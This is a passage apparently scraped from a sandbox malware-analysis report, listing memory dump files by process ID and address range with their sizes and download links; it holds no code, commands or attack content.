memory/4052-46-0x0000000006510000-0x0000000006511000-memory.dmp

Filesize
4KB

Download
memory/4052-232-0x0000000008F40000-0x0000000008F58000-memory.dmp

Filesize
96KB

Download
memory/4052-20-0x0000000000000000-mapping.dmp

Download
memory/4052-36-0x0000000006B50000-0x0000000006B51000-memory.dmp

Filesize
4KB

Download
memory/4052-71-0x0000000006512000-0x0000000006513000-memory.dmp

Filesize
4KB

Download
memory/4052-195-0x0000000009D90000-0x0000000009D91000-memory.dmp

Filesize
4KB

Download
memory/4052-26-0x0000000070C80000-0x000000007136E000-memory.dmp

Filesize
6.9MB

Download
memory/4052-196-0x0000000006513000-0x0000000006514000-memory.dmp

Filesize
4KB

Download
memory/4520-210-0x0000000006963000-0x0000000006964000-memory.dmp

Filesize
4KB

Download
memory/4520-78-0x0000000006962000-0x0000000006963000-memory.dmp

Filesize
4KB

Download
memory/4520-33-0x0000000070C80000-0x000000007136E000-memory.dmp

Filesize
6.9MB

Download
memory/4520-23-0x0000000000000000-mapping.dmp

Download
memory/4520-76-0x0000000006960000-0x0000000006961000-memory.dmp

Filesize
4KB

Download
memory/4540-77-0x0000000006A00000-0x0000000006A01000-memory.dmp

Filesize
4KB

Download
memory/4540-37-0x0000000070C80000-0x000000007136E000-memory.dmp

Filesize
6.9MB

Download
memory/4540-200-0x0000000006A03000-0x0000000006A04000-memory.dmp

Filesize
4KB

Download
memory/4540-24-0x0000000000000000-mapping.dmp

Download
memory/4540-79-0x0000000006A02000-0x0000000006A03000-memory.dmp

Filesize
4KB

Download
memory/4564-43-0x0000000070C80000-0x000000007136E000-memory.dmp

Filesize
6.9MB

Download
memory/4564-49-0x0000000004770000-0x0000000004771000-memory.dmp

Filesize
4KB

Download
memory/4564-25-0x0000000000000000-mapping.dmp

Download
memory/4564-209-0x0000000004773000-0x0000000004774000-memory.dmp

Filesize
4KB

Download
memory/4564-54-0x0000000004772000-0x0000000004773000-memory.dmp

Filesize
4KB

Download
memory/4776-4-0x0000000000401000-0x00000000004B7000-memory.dmp

Filesize
728KB

Download